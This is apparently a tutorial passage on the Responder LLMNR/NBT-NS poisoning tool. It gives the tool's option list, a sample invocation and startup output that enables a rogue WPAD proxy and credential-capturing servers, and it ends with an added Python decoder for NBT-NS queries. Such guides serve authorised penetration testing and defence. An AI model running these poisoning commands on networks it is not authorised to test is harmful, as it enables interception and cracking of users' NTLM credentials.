Responder is first and foremost an LLMNR and NBT-NS responder: it answers *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool only answers File Server Service requests, which are for SMB. The concept behind this is to target our answers and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option to 1 on the command line if you want the tool to answer the Workstation Service request name suffix.
responder -i 10.20.30.40 -b 1 -s On -r 0
  -h, --help
        show this help message and exit
  -i 10.20.30.40, --ip=10.20.30.40
        The ip address to redirect the traffic to. (usually yours)
  -b 0, --basic=0
        Set this to 1 if you want to return a Basic HTTP authentication. 0 will return an NTLM authentication.This option is mandatory.
  -s Off, --http=Off
        Set this to On or Off to start/stop the HTTP server. Default value is On
  -S Off, --smb=Off
        Set this to On or Off to start/stop the SMB server. Default value is On
  -q Off, --sql=Off
        Set this to On or Off to start/stop the SQL server. Default value is On
  -r 0, --wredir=0
        Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' will). Default value is therefore set to Off (0)
  -c 1122334455667788, --challenge=1122334455667788
        The server challenge to set for NTLM authentication. If not set, then defaults to 1122334455667788, the most common challenge for existing Rainbow Tables
  -l Responder-Session.log, --logfile=Responder-Session.log
        Log file to use for Responder session.
  -f Off, --fingerprint=Off
        This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
  -F On, --ftp=On
        Set this to On or Off to start/stop the FTP server. Default value is On
  -L On, --ldap=On
        Set this to On or Off to start/stop the LDAP server. Default value is On
  -D On, --dns=On
        Set this to On or Off to start/stop the DNS server. Default value is On
  -w On, --wpad=On
        Set this to On or Off to start/stop the WPAD rogue proxy server. Default value is On
cyborg@cyborg:~$ sudo responder -i 192.168.1.6 -w On -r 0 -f On
NBT Name Service/LLMNR Answerer 1.0.
Please send bugs/comments to: [email protected]
To kill this script hit CRTL-C

[+]NBT-NS & LLMNR responder started
Global Parameters set
Challenge set is: 1122334455667788
WPAD Proxy Server is:ON
HTTP Server is:ON
SMB Server is:ON
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:ON
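The name-suffix filtering described in the first paragraph can be seen by decoding an NBT-NS query, which is useful when reviewing a capture to see which broadcast name queries on a segment fall within a responder's default scope. The following is an added example, not Responder's own code: the function names, the sample host names and the in_scope() model of the -r option are assumptions made for illustration.

```python
import struct

# 16th byte of a NetBIOS name is the service suffix (Microsoft KB 163409).
SUFFIXES = {0x00: "Workstation Service", 0x20: "File Server Service"}

def encode_name(name, suffix):
    """RFC 1001 first-level encoding: 15 padded chars + suffix, one letter per nibble."""
    raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix])
    return bytes(c for b in raw for c in (0x41 + (b >> 4), 0x41 + (b & 0x0F)))

def build_query(name, suffix, txid=0x1337):
    """Constructed sample: broadcast NBT-NS name query (flags RD+B, type NB, class IN)."""
    header = struct.pack(">HHHHHH", txid, 0x0110, 1, 0, 0, 0)
    question = b"\x20" + encode_name(name, suffix) + b"\x00"
    return header + question + struct.pack(">HH", 0x0020, 0x0001)

def parse_query(packet):
    """Return (name, suffix, service) for an NBT-NS name query, else None."""
    if len(packet) < 50:                      # 12 header + 34 name + 4 type/class
        return None
    _txid, flags, qdcount = struct.unpack(">HHH", packet[:6])
    if flags & 0x8000 or (flags >> 11) & 0xF or qdcount != 1:
        return None                           # a response, or not a plain query
    if packet[12] != 0x20 or packet[45] != 0x00:
        return None                           # unexpected label length / scope id
    enc = packet[13:45]
    if any(not 0x41 <= c <= 0x50 for c in enc):
        return None                           # not valid first-level encoding
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41)
                for i in range(0, 32, 2))
    name = raw[:15].decode("ascii", "replace").rstrip()
    return name, raw[15], SUFFIXES.get(raw[15], "other")

def in_scope(suffix, wredir=False):
    """Model of the behaviour the page describes: File Server Service (0x20)
    queries are answered by default, Workstation Service (0x00) only with -r 1."""
    return suffix == 0x20 or (wredir and suffix == 0x00)

if __name__ == "__main__":
    # Host names below are constructed sample data.
    for host, sfx in (("fileshare", 0x20), ("wkstn01", 0x00)):
        name, suffix, service = parse_query(build_query(host, sfx))
        print(f"{name:<15} <{suffix:02X}> {service:<20} "
              f"default={in_scope(suffix)} with -r 1={in_scope(suffix, True)}")
```
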